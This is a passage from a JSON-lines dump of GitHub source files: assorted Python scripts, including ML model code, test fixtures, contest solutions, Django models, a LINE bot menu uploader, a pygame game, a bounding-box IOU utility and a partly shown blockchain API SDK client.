f:\n js = json.loads(line.strip())\n code = js['func']\n source_codes.append(code)\n assert (len(source_codes) == len(all_dataset))\n print('length of all data', len(source_codes))\n\n all_labels = {}\n with open(args.store_path, \"w\") as wf:\n for index, example in enumerate(tqdm(all_dataset)):\n logits, preds = model.get_results([example], args.eval_batch_size)\n\n if args.model_name == 'codebert':\n true_label = str(int(example[1].item()))\n elif args.model_name == 'graphcodebert':\n true_label = str(int(example[3].item()))\n\n orig_prob = np.max(logits[0])\n orig_label = str(int(preds[0]))\n\n if not true_label == orig_label:\n continue\n\n if true_label not in all_labels.keys():\n all_labels[true_label] = []\n\n variable_name, function_name, _ = get_identifiers(remove_comments_and_docstrings(source_codes[index], \"c\"), \"c\")\n\n code = source_codes[index]\n embeddings = get_embeddings(code, variable_name+function_name, tokenizer_mlm, codebert_mlm, args)\n\n np.save('./dataset/%s_all_subs/%s_%s' % (args.model_name, str(orig_label), str(index)), embeddings.cpu().numpy())\n all_labels[true_label].append({'code': code, 'embeddings_index': index, 'variable_name': variable_name, 'function_name': function_name})\n wf.write(json.dumps(all_labels) + '\\n')\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"tianzhaotju/CODA","sub_path":"test/VulnerabilityPrediction/dataset/get_reference.py","file_name":"get_reference.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"90"} +{"seq_id":"20012160681","text":"import json\nimport os\nimport pymongo\nimport pytest\nfrom pymongo.collection import Collection\nfrom songs.app import create_app\nfrom songs.extensions import mongo\n\nHERE = os.path.abspath(os.path.dirname(__file__))\nPROJECT_ROOT = os.path.join(HERE, os.pardir)\nTEST_PATH = os.path.join(PROJECT_ROOT, \"tests\")\n\n\n@pytest.fixture()\ndef app():\n \"\"\"\n Use test database.\n Create songs collection, import the data from songs.json and remove it afterwards.\n \"\"\"\n app = create_app('tests.settings')\n app.config.update({\n \"TESTING\": True,\n })\n \n mongo.db.drop_collection('songs')\n mongo.db.create_collection('songs')\n songs: Collection = mongo.db.songs\n \n with open(os.path.join(PROJECT_ROOT, 'tests', 'songs.json')) as f:\n songs_data = map(lambda x: json.loads(x), f.readlines())\n \n songs.insert_many(songs_data)\n\n songs.create_index([('title', pymongo.TEXT), ('artist', pymongo.TEXT)])\n songs.create_index([('released', pymongo.ASCENDING)])\n\n yield app\n\n mongo.db.drop_collection('songs')\n\n\n@pytest.fixture()\ndef client(app):\n return app.test_client()\n\n\n@pytest.fixture()\ndef runner(app):\n return app.test_cli_runner()\n","repo_name":"dkarpushkin/TheSongsFlaskMongo","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18436899369","text":"import sys\nlines = [s.rstrip(\"\\n\") for s in sys.stdin.readlines()]\na, b, k = [int(num) for num in lines.pop(0).split(\" \")]\ncount = 0\nfor n in range(min(a, b), 0, -1):\n if (a % n == 0) and (b % n == 0):\n count += 1\n if count == k:\n break\nprint(n)\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03106/s785862446.py","file_name":"s785862446.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18466473229","text":"import sys\nsys.setrecursionlimit(10000000)\ndef input():\n return sys.stdin.readline()[:-1]\nfrom collections import *\nimport math\nfrom bisect import *\nINF = float('inf')\n\nN, K = map(int, input().split())\na = list(map(int, input().split()))\ndp = [0] * (K+1)\nfor i in range(K+1):\n for j in range(N):\n if a[j] <= i:\n dp[i] |= dp[i-a[j]] == 0\nans = 'First' if dp[K] else 'Second'\nprint(ans)\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03170/s401036684.py","file_name":"s401036684.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17927671605","text":"#!/usr/bin/env python\n# coding: utf-8\nimport sys\nsys.path.append('..')\nimport numpy as np\nfrom chapter7.seq2seq import Seq2seq\nfrom common.time_layers import TimeEmbedding, TimeLSTM, TimeAffine,\\\n TimeSoftmaxWithLoss\nfrom common.base_model import BaseModel\n\n\nclass Encoder:\n def __init__(self, vocab_size, wordvec_size, hidden_size):\n '''\n vocab_size: 語彙数\n wordvec_size: 文字ベクトルの次元数\n hidden_size: LSTMレイヤの隠れ状態ベクトルの次元数\n '''\n V, D, H = vocab_size, wordvec_size, hidden_size\n rn = np.random.randn\n\n embed_W = (rn(V, D) / 100).astype('f')\n lstm_Wx = (rn(D, 4 * H) / np.sqrt(D)).astype('f')\n lstm_Wh = (rn(H, 4 * H) / np.sqrt(H)).astype('f')\n lstm_b = np.zeros(4 * H).astype('f')\n\n self.embed = TimeEmbedding(embed_W)\n self.lstm = TimeLSTM(lstm_Wx, lstm_Wh, lstm_b, stateful=False)\n\n self.params = self.embed.params + self.lstm.params\n self.grads = self.embed.grads + self.lstm.grads\n self.hs = None\n\n def forward(self, xs):\n # 最後の隠れ状態を出力\n xs = self.embed.forward(xs)\n hs = self.lstm.forward(xs)\n self.hs = hs\n return hs[:, -1, :]\n\n def backward(self, dh):\n # 入力は隠れ状態に対する勾配がdh\n dhs = np.zeros_like(self.hs)\n dhs[:, -1, :] = dh\n\n dout = self.lstm.backward(dhs)\n dout = self.embed.backward(dout)\n return dout\n\n\nclass PeekyDecoder:\n def __init__(self, vocab_size, wordvec_size, hidden_size):\n V, D, H = vocab_size, wordvec_size, hidden_size\n rn = np.random.randn\n\n embed_W = (rn(V, D) / 100).astype('f')\n lstm_Wx = (rn(H + D, 4 * H) / np.sqrt(H + D)).astype('f')\n lstm_Wh = (rn(H, 4 * H) / np.sqrt(H)).astype('f')\n lstm_b = np.zeros(4 * H).astype('f')\n affine_W = (rn(H + H, V) / np.sqrt(H + H)).astype('f')\n affine_b = np.zeros(V).astype('f')\n\n self.embed = TimeEmbedding(embed_W)\n self.lstm = TimeLSTM(lstm_Wx, lstm_Wh, lstm_b, stateful=True)\n self.affine = TimeAffine(affine_W, affine_b)\n\n self.params, self.grads = [], []\n\n for layer in (self.embed, self.lstm, self.affine):\n self.params += layer.params\n self.grads += layer.grads\n self.cache = None\n\n def forward(self, xs, h):\n N, T = xs.shape\n N, H = h.shape\n\n self.lstm.set_state(h)\n\n out = self.embed.forward(xs)\n hs = np.repeat(h, T, axis=0).reshape(N, T, H)\n out = np.concatenate((hs, out), axis=2)\n\n out = self.lstm.forward(out)\n out = np.concatenate((hs, out), axis=2)\n\n score = self.affine.forward(out)\n self.cache = H\n return score\n\n def backward(self, dscore):\n H = self.cache\n\n dout = self.affine.backward(dscore)\n dout, dhs0 = dout[:, :, H:], dout[:, :, :H]\n dout = self.lstm.backward(dout)\n dembed, dhs1 = dout[:, :, H:], dout[:, :, :H]\n self.embed.backward(dembed)\n\n dhs = dhs0 + dhs1\n dh = self.lstm.dh + np.sum(dhs, axis=1)\n return dh\n\n def generate(self, h, start_id, sample_size):\n '''\n h: Encoderから受け取る隠れ状態\n start_id: 最初に与える文字ID\n sample_size: 生成する文字数\n '''\n sampled = []\n sample_id = start_id\n self.lstm.set_state(h)\n\n for _ in range(sample_size):\n x = np.array(sample_id).reshape((1, 1))\n out = self.embed.forward(x)\n out = self.lstm.forward(out)\n score = self.affine.forward(out)\n\n sample_id = np.argmax(score.flatten())\n sampled.append(int(sample_id))\n\n return sampled\n\n\nclass PeekySeq2seq(Seq2seq):\n def __init__(self, vocab_size, wordvec_size, hidden_size):\n V, D, H = vocab_size, wordvec_size, hidden_size\n self.encoder = Encoder(V, D, H)\n self.decoder = PeekyDecoder(V, D, H)\n self.softmax = TimeSoftmaxWithLoss()\n\n self.params = self.encoder.params + self.decoder.params\n self.grads = self.encoder.grads + self.decoder.grads\n","repo_name":"MATOBAD/NLP","sub_path":"chapter7/peeky_seq2seq.py","file_name":"peeky_seq2seq.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18055632219","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\n\ndef main():\n X = input().rstrip()\n\n stack = deque()\n for x in X:\n if len(stack) == 0:\n stack.append(x)\n else:\n if x == \"S\":\n stack.append(x)\n else:\n if stack[-1] == \"S\":\n stack.pop()\n else:\n stack.append(x)\n ans = len(stack)\n\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03986/s439214462.py","file_name":"s439214462.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"71880605416","text":"#!/usr/bin/env python3\n\"\"\"\nAndrew Patrick - apatric1\nProg Fundamentals: Python\nHomework 05: Task:\n Write a program that prints out the command line arguments\n it receives, in reverse order from last to first.\n\"\"\"\n# This test uses string methods, no loops (shorter, faster?)\n# using sys.argv to access command line arguments\nimport sys\n# pop 0 from sys.argv then join reversed\narguments = sys.argv\narguments.pop(0)\nprint(' '.join(reversed(arguments)))\n","repo_name":"drew1701/ccsf_cs131b","sub_path":"apatric1_hw05c.py","file_name":"apatric1_hw05c.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"74874128936","text":"from __future__ import annotations\n\nimport smtplib\nimport ssl\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom operator import attrgetter\n\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from typing import List\n from shout_ahead.AgentPool import AgentPool\n\n\nclass Notifier:\n def __init__(self, email: str, password: str, recipients: List[str], id: str) -> None:\n self.email = email\n self.password = password\n self.recipients = recipients\n self.id = id\n\n def sendEmail(self, subject: str, content: str) -> None:\n port = 465\n context = ssl.create_default_context()\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = f\"ASP VM: {self.id} {subject}\"\n message[\"From\"] = self.email\n\n message.attach(MIMEText(content, \"plain\"))\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", port, context=context) as server:\n server.login(self.email, self.password)\n for recipient in self.recipients:\n message['To'] = recipient\n server.sendmail(self.email, recipient, message.as_string())\n\n def run(self, agentPools: List[AgentPool], generationRuntimes: List[float], episodeRuntimes: List[float], totalGenerations: int):\n genTime = generationRuntimes[-1]\n averageGenTime = sum(generationRuntimes) / len(generationRuntimes)\n generations = len(generationRuntimes)\n averageEpisodeTime = sum(episodeRuntimes) / len(episodeRuntimes)\n episodes = len(episodeRuntimes)\n\n # Create new output file and add generation runtime information\n message = \"\"\n message += f\"Generation {generations} Stats\\n\\n\"\n message += f\"Generation runtime: {genTime}\\n\"\n message += f\"Average generation runtime: {averageGenTime}\\n\"\n message += f\"Average episode runtime: {averageEpisodeTime}\\n\"\n message += f\"Episodes: {episodes}\\n\"\n message += \"\\n---------------------------\\n\\n\"\n message += \"Best Individuals per Agent Pool\\n\\n\"\n\n for ap in agentPools:\n actionSet = \"\"\n for a in ap.getActionSet()[:-1]:\n actionSet += f\"{a}, \"\n actionSet += ap.getActionSet()[-1]\n\n message += f\"ID: {ap.getID()}\\n\"\n message += f\"Action set: {', '.join(ap.getActionSet())}\\n\"\n\n individuals = ap.getIndividualsSet()\n topIndividual = min(individuals, key=attrgetter('fitness'))\n message += f\"Top individual fitness: {topIndividual.getFitness()}\"\n\n nonZeroRules = {\n \"RS\": [str(r) for r in topIndividual.getRS() if r.getWeight() != 0],\n \"RSint\": [str(r) for r in topIndividual.getRSint() if r.getWeight() != 0],\n }\n for ruleSet in nonZeroRules:\n if nonZeroRules[ruleSet] == []:\n continue\n message += f\"\\n\\n{ruleSet}\\n\"\n for rule in nonZeroRules[ruleSet]:\n message += rule\n message += \"\\n\\n*************************\\n\\n\"\n\n self.sendEmail(f\"Gen {generations} of {totalGenerations} complete!\", message)\n","repo_name":"xuchef/shout-ahead-EV-preemption","sub_path":"output_management/Notifier.py","file_name":"Notifier.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17962899849","text":"S=input()\nl=[0]*26\nfor i in range(len(S)):\n l[ord(S[i])-97]+=1\nfor j in range(26):\n if l[j]==0:\n print(chr(j+97))\n break\nelse:\n print(\"None\")","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03624/s596418977.py","file_name":"s596418977.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"37295803341","text":"\"\"\"\ncalculating predictions at the end of the training\n\"\"\"\n\nimport pandas as pd\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\n\nfrom config import config\nfrom utils.computing_device import get_device\nfrom utils.logging import get_logger\n\nlogger = get_logger(__name__)\n\n\ndef save_predictions(model: nn.Module, train_loader: DataLoader, val_loader: DataLoader) -> None:\n \"\"\"\n Save predictions as csv dataframes\n :param model:\n :param train_loader:\n :param val_loader:\n :return:\n \"\"\"\n logger.info(\"prediction saving: START\")\n predictions_message = config.get_prediction_msg()\n target_dir = config.get_exp_dir()\n load_model_best_params(model)\n\n device = get_device()\n with torch.no_grad():\n for phase, data_loader in zip([\"train\", \"val\"], [train_loader, val_loader]):\n n_batches = len(data_loader)\n true_labels, predicted_labels = [], []\n for batch_idx, (inputs, targets) in enumerate(data_loader, 1):\n inputs = inputs.to(device)\n outputs = model(inputs)\n true_labels.extend(targets.tolist())\n predicted_labels.extend(outputs.max(1).indices.tolist())\n\n logger.info(predictions_message.format(batch_idx, n_batches))\n\n results = pd.DataFrame(data={\"reference\": true_labels, \"predicted\": predicted_labels})\n\n results.to_csv(target_dir / f\"predictions_{phase}.csv\", index=False)\n logger.info(\"prediction saving: END\")\n\n\ndef load_model_best_params(model: nn.Module) -> None:\n \"\"\"\n Load model best params\n :param model:\n :return:\n \"\"\"\n best_model_path = config.get_best_model_file()\n model_state_dict = torch.load(best_model_path)[\"model\"]\n model.load_state_dict(model_state_dict)\n model.eval()\n","repo_name":"sofglide/lesion-diagnosis","sub_path":"src/saving/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"36874904497","text":"from django.db import models\nfrom django.contrib.auth.models import User\nimport datetime\n\n\nclass Contact_Us(models.Model):\n name = models.CharField(max_length=250)\n contact_number = models.IntegerField(blank=True, unique=True)\n subject = models.CharField(max_length=250)\n message = models.TextField()\n added_on = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"Contact Us\"\n\n\nclass Category(models.Model):\n cat_name = models.CharField(max_length=250)\n cover_pic = models.FileField(upload_to=\"media/%Y/%m/%d\")\n description = models.TextField()\n added_on = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.cat_name\n\n\nclass register_table(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n contact_number = models.BigIntegerField()\n profile_pic = models.ImageField(\n upload_to=\"profiles/%Y/%m/%d\", null=True, blank=True)\n age = models.CharField(max_length=250, null=True, blank=True)\n city = models.CharField(max_length=250, null=True, blank=True)\n about = models.TextField(blank=True, null=True)\n gender = models.CharField(max_length=250, default=\"Male\")\n address = models.CharField(max_length=250, null=True, blank=True)\n occupation = models.CharField(max_length=250, null=True, blank=True)\n added_on = models.DateTimeField(auto_now_add=True, null=True)\n update_on = models.DateTimeField(auto_now=True, null=True)\n\n def __str__(self):\n return self.user.username\n\n\nclass add_product(models.Model):\n seller = models.ForeignKey(User, on_delete=models.CASCADE)\n product_name = models.CharField(max_length=250)\n product_category = models.ForeignKey(Category, on_delete=models.CASCADE)\n product_price = models.FloatField()\n sale_price = models.CharField(max_length=200)\n product_image = models.ImageField(upload_to=\"products/%Y/%m/%d\")\n details = models.TextField()\n qty = models.IntegerField(default=1)\n\n def __str__(self):\n return self.product_name\n\n\nclass cart(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n product = models.ForeignKey(add_product, on_delete=models.CASCADE)\n quantity = models.IntegerField()\n status = models.BooleanField(default=False)\n added_on = models.DateTimeField(auto_now_add=True, null=True)\n update_on = models.DateTimeField(auto_now=True, null=True)\n\n def __str__(self):\n return self.user.username\n\n\nclass Order(models.Model):\n product = models.ForeignKey(add_product, on_delete=models.CASCADE,null=True)\n cust_id = models.ForeignKey(User, on_delete=models.CASCADE)\n cart_ids = models.CharField(max_length=250)\n product_ids = models.CharField(max_length=250)\n invoice_id = models.CharField(max_length=250)\n status = models.BooleanField(default=False)\n processed_on = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.cust_id.username\n\n\nclass balance(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n balance = models.IntegerField(default=0)\n wallet_balance = models.IntegerField(default=0)\n def __str__(self):\n return self.user.username\nclass wishlist(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n product = models.ForeignKey(add_product, on_delete=models.CASCADE)\nclass Review(models.Model):\n name = models.CharField(max_length=30 , null = True)\n contact = models.BigIntegerField(default=1,null=True)\n product_id = models.ForeignKey(add_product, on_delete=models.CASCADE)\n review = models.CharField(max_length=250)\n time = models.DateTimeField(auto_now_add=True)\n def __str__(self):\n return self.product_id.product_name\n\n\n\n\n\n","repo_name":"Rishi-source/dvm","sub_path":"secondapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"1528204886","text":"import glob\nimport json\nfrom linebot import LineBotApi\nfrom linebot.models import RichMenu\n\nsecretFileContentJson = json.load(open(\"./line_secret_key\", \"r\", encoding=\"utf8\"))\n\n# 載入安全設定檔\nchannel_access_token = secretFileContentJson.get(\"LINE_CHANNEL_ACCESS_TOKEN\")\n\nline_bot_api = LineBotApi(channel_access_token)\n\n# 讀取選單 json、jpg,json 利用 Line bot Designer 設計出來\njson_path_list = glob.glob(r'.\\menu\\*.json')\njpg_path_list = glob.glob(r'.\\menu\\*.jpg')\n\n# 檔案上傳順序確認\nprint(json_path_list)\nprint(jpg_path_list)\n\n# 依序上傳\nfor index in range(len(json_path_list)):\n print(f'上傳第 {index + 1} 組')\n # 創建菜單,取得 menuId\n try:\n lineRichMenuId = line_bot_api.create_rich_menu(rich_menu=RichMenu.new_from_json_dict(json.load(open(json_path_list[index], 'r', encoding='utf8'))))\n print(lineRichMenuId)\n except:\n print('建立 json 失敗')\n\n # 上傳照片至該id\n try:\n with open(jpg_path_list[index], 'rb') as f:\n set_image_response = line_bot_api.set_rich_menu_image(lineRichMenuId, 'image/jpeg', f)\n except:\n print('上傳失敗')\n\nprint('上傳完成')","repo_name":"oange6214/Tibame_Projects","sub_path":"01_CV_Catus/catus-EfficientNet/rich_menu.py","file_name":"rich_menu.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"18875987918","text":"import codecs\nimport collections\nimport logging\nimport sys\nfrom threading import Thread, Lock\n\nclass View(object):\n\t_KILL_SEQ = codecs.encode(b\"\\xDC\\xCD\", \"hex\")\n\n\tdef __init__(self, params):\n\t\tself._is_thread_run = True\n\t\tself._input_thread = Thread(target = self._io_thread_main)\n\t\tself._input_queue = collections.deque()\n\t\tself._input_queue_mutex = Lock()\n\n\tdef run(self):\n\t\tself._input_thread.start()\n\n\tdef get_input(self):\n\t\tif not self._input_queue:\n\t\t\treturn None\n\n\t\tself._input_queue_mutex.acquire()\n\t\ttry:\n\t\t\ttext = self._input_queue.popleft()\n\t\tfinally:\n\t\t\tself._input_queue_mutex.release()\n\t\t\treturn text\n\n\tdef on_new_input(self):\n\t\tpass\n\n\tdef on_dismiss(self):\n\t\tpass\n\n\tdef join_io_thread(self):\n\t\tself._is_thread_run = False\n\t\tself._input_thread.join()\n\n\tdef is_test_input(self):\n\t\treturn False\n\n\tdef gen_test_input(self):\n\t\treturn None\n\n\tdef _io_thread_main(self):\n\t\twhile self._is_thread_run:\n\t\t\tif not self.is_test_input():\n\t\t\t\ttext = sys.stdin.readline()\n\t\t\telse:\n\t\t\t\tif \"test_gen\" not in locals():\n\t\t\t\t\ttest_gen = self.gen_test_input()\n\t\t\t\ttext = next(test_gen)\n\n\t\t\tif not text:\n\t\t\t\tlogging.error(\"Failed while readline\")\n\t\t\t\tself.on_dismiss()\n\t\t\t\treturn\n\n\t\t\ttext = text[:-1]\n\t\t\tself._input_queue_mutex.acquire()\n\t\t\ttry:\n\t\t\t\tself._input_queue.append(text)\n\t\t\tfinally:\n\t\t\t\tself._input_queue_mutex.release()\n\t\t\tself.on_new_input()\n","repo_name":"hkust-smartcar/sc-studio","sub_path":"src/sc_studio/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5874499758","text":"import pygame\n\n\nclass Endzone(pygame.sprite.Sprite):\n \"\"\"Creates a transparent Rect Endzone Sprite at the given Position.\"\"\"\n\n def __init__(self, pos_x, pos_y):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([20, 20], pygame.SRCALPHA, 32)\n self.position_x = pos_x\n self.position_y = pos_y\n self.rect = self.image.get_rect()\n\n def draw(self, screen):\n screen.blit(self.image, (self.position_x, self.position_y))\n\n def update(self):\n self.rect.x = self.position_x\n self.rect.y = self.position_y\n\n def reached(self, player):\n \"\"\"Renders an the Image of the colliding Player instead of the transparent playholder rect.\n\n Gives the illusion the player is still standing in the endzone.\n \"\"\"\n\n self.image = player.image\n\n\nclass Endzones:\n \"\"\"Creates all needed Endzones and groups them for easy access.\"\"\"\n\n def __init__(self):\n self.ez1 = Endzone(243, 165)\n self.ez2 = Endzone(450, 165)\n self.ez3 = Endzone(630, 165)\n self.ez4 = Endzone(830, 165)\n self.ez5 = Endzone(1010, 165)\n self.group = pygame.sprite.Group()\n self.group.add(self.ez1, self.ez2, self.ez3, self.ez4, self.ez5)\n\n def check_for_reach(self, character, scorer):\n \"\"\"Checks if any of the endzones in the group collide with the given Character.\n\n Let the Character cheer if so\n and Renders the last Image of the Character\n and Updates the Scorer\n \"\"\"\n\n reached_endzone = pygame.sprite.spritecollideany(character, self.group)\n if reached_endzone:\n character.cheer()\n reached_endzone.reached(character)\n character.back_to_start()\n scorer.reached_goal()\n scorer.add_points(500)\n","repo_name":"Extraordinary-FH-Gaming-Collective/game","sub_path":"endzone.py","file_name":"endzone.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"20572608574","text":"import numpy as np\n\nfrom src.detect.utils import xyxy2xywh\n\nlow = np.s_[..., :2]\nhigh = np.s_[..., 2:]\n\n\ndef iou_matrix(A: np.ndarray, B: np.ndarray):\n # Based on code from\n # https://stackoverflow.com/questions/57897578/efficient-way-to-calculate-all-ious-of-two-lists\n A = A[:, None].copy()\n B = B[None].copy()\n intrs = (np.maximum(0, np.minimum(A[high], B[high])\n - np.maximum(A[low], B[low]))).prod(-1)\n return intrs / ((A[high]-A[low]).prod(-1)+(B[high]-B[low]).prod(-1)-intrs)\n\n\ndef merge_bboxes(A: np.ndarray, B: np.ndarray, threshold: float = 0.7)\\\n -> np.ndarray:\n \"\"\"Merge two sets of bboxes:\n\n 1. If there are bboxes in B with iou > threshould, the bboxes in A are\n replaced with corresponding bboxes from B.\n 2. If there are no corresponding bboxes in A, the bboxes from B are\n appended to A.\n\n Args:\n A (np.ndarray): A bboxes (N, P), where P >= 4 (x1, y1, x2, y2 and any\n extra values).\n B (np.ndarray): B bboxes (M, P).\n threshold (float, optional): IOU threshold, should be in [0.0..1.0].\n Defaults to 0.7.\n \"\"\"\n iou = iou_matrix(A[:, :4], B[:, :4])\n similar_mask = iou > threshold\n\n # Find the row indices in B and A where IOUs > threshold\n a_indices, b_indices = np.where(similar_mask)\n\n # Update the corresponding rows in A with the rows from B\n print('Replaced in A:', a_indices, '<-', b_indices)\n A[a_indices] = B[b_indices]\n\n # Find rows in B that have no similar bboxes in A by the IOU threshold\n unique_b_indices = np.setdiff1d(np.arange(len(B)), b_indices)\n print('Added from B:', unique_b_indices)\n A = np.vstack((A, B[unique_b_indices]))\n\n return A\n\n\nif __name__ == '__main__':\n A = np.array([[1, 1, 2, 2, 0.4],\n [1, 1, 4, 4, 0.4],\n [2, 2, 3, 4, 0.4]]).astype(float)\n B = np.array([[2, 2, 3, 3, 1.0],\n [2, 2, 3.1, 4, 1.0]]).astype(float)\n ious = iou_matrix(A[:, :4], B[:, :4])\n max_indices = np.argmax(ious, axis=1)\n max_iou = np.max(ious, axis=1)\n print(ious)\n print(merge_bboxes(A, B, 0.7))\n","repo_name":"AleksandrSim/strong_sort_yolox","sub_path":"src/tools/iou.py","file_name":"iou.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18001068259","text":"N,W=map(int,input().split())\ndp=[[-1]*301 for i in range(N+1)]\ndp[0][0]=0\n\nfor i in range(N):\n w,v=map(int,input().split())\n if i==0:\n base=w\n for i in range(N)[::-1]:\n for j in range(301)[::-1]:\n if dp[i][j]!=-1:\n dp[i+1][j+w-base]=max(dp[i][j]+v,dp[i+1][j+w-base])\n\nans=0\nfor index,item in enumerate(dp):\n if W-index*base+1<=0:\n break\n ans=max(max(item[:W-index*base+1]),ans)\n\nprint(ans)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03732/s870619477.py","file_name":"s870619477.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"16757634505","text":"import time\nimport requests\n\nfrom ..src.util.models import *\n\nfrom ..src.util.errors import *\nfrom ..src.api.ens.base import ENS\nfrom ..src.api.nft.base import NFT\nfrom ..src.api.block.base import Block\nfrom ..src.api.token.base import Token\nfrom ..src.api.sql.base import SQL\nfrom ..src.api.endpoint.base import Endpoint\n\n# base class for the Transpose python SDK\nclass Transpose:\n def __init__(\n self,\n api_key: str,\n debug: bool=False,\n host: str=None,\n chain_id: int=0,\n chain: str=\"ethereum\",\n json: bool=False,\n ) -> None:\n\n self._next = None\n self._next_class_name = None\n self.host = host if host else 'https://api.transpose.io'\n self.verbose = debug\n self.json = json\n \n if chain.lower() == \"ethereum\": \n self.chain_id = 1\n \n if chain.lower() == \"polygon\": \n self.chain_id = 137\n \n if chain_id != 0:\n self.chain_id = chain_id\n\n # verifies that the API key is valid\n if self.perform_authorized_request(Block, 'https://api.transpose.io/v0/block/blocks-by-number?block_number_below=1', api_key):\n self.api_key = api_key\n \n # define the subclasses\n self.ens = ENS(self)\n self.nft = NFT(self)\n self.block = Block(self)\n self.token = Token(self)\n self.sql = SQL(self)\n self.endpoint = Endpoint(self)\n \n # deprecated in favor of the new API\n self.ENS = self.ens\n self.NFT = self.nft\n self.Block = self.block\n self.Token = self.token\n \n def next(self) -> str:\n return self.perform_authorized_request(self._next_class_name, self._next)\n \n def set_chain(self, chain_id: int=0, chain: str=\"ethereum\") -> None:\n if chain.lower() == \"ethereum\": \n self.chain_id = 1\n \n if chain.lower() == \"polygon\": \n self.chain_id = 137\n \n if chain_id != 0:\n self.chain_id = chain_id\n \n # this can be renamed later. Pagination helper function to get many \n def bulk_request(self, endpoint_response: List, requests_per_second: int=None, results_to_fetch: int=999999999999) -> List:\n api_response_data = endpoint_response\n \n while len(api_response_data) < results_to_fetch and self._next is not None:\n \n api_response_data += self.next()\n \n # if the user specified a requests per second, sleep for the appropriate amount of time\n # has a 1% buffer.\n if requests_per_second is not None:\n time.sleep(1.01 / requests_per_second)\n \n return api_response_data[0:results_to_fetch]\n \n # the base function for performing authorized requests to the Transpose API suite\n def perform_authorized_request(self, model: type, endpoint: str, api_key: str=None):\n if endpoint is None: \n return None\n \n # build the request\n request_headers = {\n 'x-api-key': api_key if api_key else self.api_key,\n 'x-request-source': 'python-sdk',\n 'Accept': 'application/json',\n }\n \n # add chain_id to the request\n endpoint += f'&chain_id={self.chain_id}'\n \n # if in verbose mode, log the endpoint\n print(\"\\n{}\\n {}\\n\".format(endpoint.replace(\"https://api.transpose.io\", self.host).split(\"?\")[0], \"\\n \".join(endpoint.split(\"?\")[1].split(\"&\")))) if self.verbose else None\n request = requests.get(endpoint.replace(\"https://api.transpose.io\", self.host), headers=request_headers)\n \n # check for a successful response\n if request.status_code == 200:\n \n response = request.json()\n \n # If the response contains a paginator, set the paginator's next endpoint\n if response['next'] is None:\n self._next = None\n self._next_class_name = None\n else: \n self._next = response['next']\n self._next_class_name = model\n \n # if we are in json mode, return the raw json\n if self.json:\n return response\n\n return list(model(dict(each)) for each in response['results'])\n else:\n raise_custom_error(request.status_code, request.json()['message'])\n \n # the base function for performing authorized requests to the Transpose API suite\n def perform_authorized_request(self, model: type, endpoint: str, api_key: str=None):\n if endpoint is None: \n return None\n \n # build the request\n request_headers = {\n 'x-api-key': api_key if api_key else self.api_key,\n 'x-request-source': 'python-sdk',\n 'Accept': 'application/json',\n }\n \n # add chain_id to the request\n endpoint += f'&chain_id={self.chain_id}'\n \n # if in verbose mode, log the 